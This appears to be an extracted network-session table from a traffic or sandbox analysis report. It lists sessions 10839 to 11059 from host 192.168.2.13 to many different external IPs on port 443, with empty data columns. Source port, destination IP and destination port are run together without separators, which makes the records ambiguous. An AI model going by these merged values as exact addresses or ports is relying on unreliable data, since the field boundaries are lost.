                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10839192.168.2.1348260198.245.122.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10840192.168.2.1340506202.48.250.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10841192.168.2.1355372166.96.250.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10842192.168.2.1341142145.219.251.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10843192.168.2.135400264.1.30.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10844192.168.2.1336240112.170.120.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10845192.168.2.1344128192.207.32.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10846192.168.2.1341922158.50.105.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10847192.168.2.1342698103.36.131.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10848192.168.2.135878838.92.248.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10849192.168.2.1341140141.140.66.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10850192.168.2.1353436142.144.30.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10851192.168.2.1344214181.252.227.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10852192.168.2.1340926209.238.160.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10853192.168.2.1333712115.212.192.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10854192.168.2.135994846.8.2.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10855192.168.2.1340854163.78.102.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10856192.168.2.1348858130.144.41.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10857192.168.2.134817481.118.242.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10858192.168.2.1360752183.173.232.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10859192.168.2.1340382114.107.11.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10860192.168.2.1340786197.15.106.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10861192.168.2.1347982220.254.239.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10862192.168.2.135870247.25.186.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10863192.168.2.1342764119.80.81.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10864192.168.2.133879286.233.186.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10865192.168.2.1338482126.34.47.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10866192.168.2.134654444.227.21.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10867192.168.2.1354470178.246.56.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10868192.168.2.1333874128.18.150.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10869192.168.2.134956064.210.227.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10870192.168.2.135954691.79.248.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10871192.168.2.1349276195.182.130.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10872192.168.2.135949439.200.240.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10873192.168.2.1355770165.60.221.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10874192.168.2.1333356138.155.198.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10875192.168.2.1336516222.215.122.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10876192.168.2.133593661.163.236.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10877192.168.2.133660892.19.48.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10878192.168.2.1338236178.32.213.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10879192.168.2.1357476181.210.101.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10880192.168.2.1358174199.174.36.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10881192.168.2.1357942164.7.60.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10882192.168.2.135148619.179.164.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10883192.168.2.134034671.54.225.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10884192.168.2.1351422204.234.243.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10885192.168.2.135175644.124.188.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10886192.168.2.1353718149.93.169.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10887192.168.2.135428294.12.240.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10888192.168.2.1341644175.0.52.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10889192.168.2.1351072169.251.191.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10890192.168.2.135597638.81.133.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10891192.168.2.1336206144.198.107.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10892192.168.2.1351048150.186.233.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10893192.168.2.1334304157.252.8.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10894192.168.2.1338284171.5.157.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10895192.168.2.1357536163.161.77.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10896192.168.2.134784072.6.247.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10897192.168.2.1356144222.15.103.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10898192.168.2.1357838128.210.158.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10899192.168.2.1354718146.6.124.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10900192.168.2.135028237.234.25.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10901192.168.2.1357752164.79.7.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10902192.168.2.134467439.119.189.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10903192.168.2.135163232.77.174.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10904192.168.2.1357824138.138.216.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10905192.168.2.1339532148.17.185.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10906192.168.2.1351984119.153.120.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10907192.168.2.1340674101.11.186.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10908192.168.2.1339634106.236.229.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10909192.168.2.13361281.80.16.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10910192.168.2.1343226181.82.185.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10911192.168.2.135466417.200.231.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10912192.168.2.135819436.141.92.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10913192.168.2.134028692.202.55.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10914192.168.2.133545462.238.251.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10915192.168.2.1343744184.99.41.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10916192.168.2.1355754108.190.32.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10917192.168.2.1357292112.131.75.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10918192.168.2.133396275.56.211.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10919192.168.2.135261664.19.2.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10920192.168.2.1354950110.243.128.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10921192.168.2.1337412208.92.45.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10922192.168.2.1354528137.171.122.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10923192.168.2.1352744142.134.77.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10924192.168.2.1341044222.228.118.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10925192.168.2.1355308126.54.6.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10926192.168.2.1360904167.63.46.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10927192.168.2.134060066.182.42.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10928192.168.2.135062892.230.231.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10929192.168.2.1333506190.224.184.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10930192.168.2.1359428201.206.34.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10931192.168.2.133698092.154.159.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10932192.168.2.134222240.102.180.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10933192.168.2.1347684171.218.93.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10934192.168.2.1343158181.114.156.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10935192.168.2.1358346138.208.1.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10936192.168.2.1353434212.26.147.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10937192.168.2.134320872.151.69.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10938192.168.2.134119867.46.37.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10939192.168.2.1339592220.229.63.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10940192.168.2.134454817.254.121.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10941192.168.2.1337854126.61.239.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10942192.168.2.1352988207.17.125.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10943192.168.2.1343368146.45.69.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10944192.168.2.1359570160.210.68.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10945192.168.2.1350614103.113.10.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10946192.168.2.133401248.171.56.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10947192.168.2.1353834105.152.114.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10948192.168.2.135051246.16.113.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10949192.168.2.133577891.204.57.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10950192.168.2.1358342128.85.225.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10951192.168.2.134958677.132.136.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10952192.168.2.1349076137.250.130.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10953192.168.2.1353394162.162.217.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10954192.168.2.1360678154.164.150.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10955192.168.2.133608248.4.69.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10956192.168.2.134926857.160.3.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10957192.168.2.134694874.117.156.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10958192.168.2.1341440120.232.16.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10959192.168.2.1355312206.152.77.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10960192.168.2.13568709.139.252.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10961192.168.2.133952888.118.23.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10962192.168.2.134831679.36.152.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10963192.168.2.135212838.223.21.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10964192.168.2.1349784190.208.138.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10965192.168.2.1349884164.2.102.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10966192.168.2.135714890.216.80.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10967192.168.2.134897878.227.133.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10968192.168.2.1336810177.112.75.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10969192.168.2.135154898.71.55.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10970192.168.2.134470042.83.115.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10971192.168.2.1334064151.60.125.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10972192.168.2.133329840.219.239.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10973192.168.2.134503059.215.147.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10974192.168.2.1346092141.174.153.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10975192.168.2.1344026110.228.199.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10976192.168.2.1339836137.220.113.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10977192.168.2.1360022130.109.151.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10978192.168.2.1339652204.93.174.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10979192.168.2.1339326210.62.233.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10980192.168.2.133583487.180.134.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10981192.168.2.1360858138.110.41.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10982192.168.2.1340828138.48.133.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10983192.168.2.1360664135.9.200.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10984192.168.2.1340012198.75.249.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10985192.168.2.1354542169.242.51.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10986192.168.2.1359478134.182.99.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10987192.168.2.1356774192.177.137.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10988192.168.2.135615648.63.91.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10989192.168.2.135574297.181.1.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10990192.168.2.133932688.198.32.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10991192.168.2.1347888208.165.9.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10992192.168.2.134967486.62.178.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10993192.168.2.1339210134.163.227.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10994192.168.2.1355630200.99.176.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10995192.168.2.1351758202.110.109.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10996192.168.2.133893877.196.153.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10997192.168.2.1333444118.59.155.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10998192.168.2.134167637.126.207.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10999192.168.2.1344796148.173.93.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11000192.168.2.1350044130.161.188.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11001192.168.2.1357052116.147.60.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11002192.168.2.1352460144.66.121.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11003192.168.2.1336496148.26.129.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11004192.168.2.136044018.21.200.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11005192.168.2.1344172188.115.96.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11006192.168.2.1355706131.52.182.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11007192.168.2.1345038104.190.201.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11008192.168.2.1339250207.127.30.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11009192.168.2.1351110164.38.69.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11010192.168.2.133328872.111.157.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11011192.168.2.1335048130.143.109.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11012192.168.2.135076273.1.163.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11013192.168.2.1335690154.159.225.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11014192.168.2.1343338135.5.120.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11015192.168.2.1350938209.162.93.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11016192.168.2.1337654118.139.195.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11017192.168.2.1345708183.72.192.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11018192.168.2.1336832143.206.179.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11019192.168.2.1342986178.11.226.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11020192.168.2.135590418.235.88.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11021192.168.2.135337220.39.91.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11022192.168.2.1333996113.93.43.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11023192.168.2.1343866123.171.176.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11024192.168.2.134040436.97.76.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11025192.168.2.1348444136.160.14.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11026192.168.2.1345596138.198.196.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11027192.168.2.134932224.166.155.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11028192.168.2.136074038.67.57.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11029192.168.2.134301266.125.9.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11030192.168.2.1354650206.117.53.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11031192.168.2.1334926154.52.235.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11032192.168.2.1360280170.69.9.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11033192.168.2.1358500116.41.150.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11034192.168.2.1338996169.33.83.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11035192.168.2.134324684.146.48.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11036192.168.2.135503083.51.50.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11037192.168.2.1354998109.91.239.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11038192.168.2.135384637.223.33.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11039192.168.2.1350120212.142.197.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11040192.168.2.1334982101.114.108.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11041192.168.2.133614458.240.8.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11042192.168.2.135257475.63.37.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11043192.168.2.134945847.1.144.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11044192.168.2.1348732116.81.242.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11045192.168.2.1336270129.2.68.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11046192.168.2.135662476.16.94.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11047192.168.2.1341090159.185.82.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11048192.168.2.135103838.124.32.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11049192.168.2.1354000123.134.187.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11050192.168.2.135727827.251.158.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11051192.168.2.1335594106.42.107.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11052192.168.2.135472899.101.233.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11053192.168.2.135390237.186.123.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11054192.168.2.135218423.176.32.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11055192.168.2.1353364204.168.91.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11056192.168.2.135772692.93.86.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11057192.168.2.1357404195.150.229.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11058192.168.2.1354972223.247.7.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11059192.168.2.135663467.63.236.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
